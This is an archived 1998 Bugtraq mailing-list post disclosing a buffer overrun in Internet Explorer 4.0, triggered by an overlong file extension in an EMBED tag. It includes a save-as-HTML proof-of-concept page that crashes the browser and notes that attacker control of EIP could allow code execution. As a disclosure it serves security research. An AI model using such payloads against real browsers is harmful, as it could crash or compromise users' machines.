[6348] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

MSIE buffer overrun

daemon@ATHENA.MIT.EDU (Georgi Guninski)
Fri Mar 20 11:21:54 1998

Date: 	Fri, 20 Mar 1998 12:09:46 +0200
Reply-To: guninski@hotmail.com
From: Georgi Guninski <guninski@HOTMAIL.COM>
To: BUGTRAQ@NETSPACE.ORG

Microsoft Internet Explorer 4.0 (don't know for other versions)
can be crashed and eventually made execute arbitrary code
with a little help of the <EMBED> tag.

The following:
<EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
opens a dialog box and closes IE 4.0.
It seems that the long file extension causes stack overrun.

The stack is smashed - full with our values, EIP is also ours and CS=SS.
So probably a string could be constructed, executing code at the
client's machine.

Solution: Do not browse hostile pages.
To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html

Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711

-----------------------cut here and save as
crashmsie.html---------------------
<HTML>
Trying to crash IE 4.0
<EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
                                                               40
80                                                                               160                    170                 180                 190          200
</HTML>


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[6348] in bugtraq

MSIE buffer overrun

daemon@ATHENA.MIT.EDU (Georgi Guninski)Fri Mar 20 11:21:54 1998

daemon@ATHENA.MIT.EDU (Georgi Guninski)
Fri Mar 20 11:21:54 1998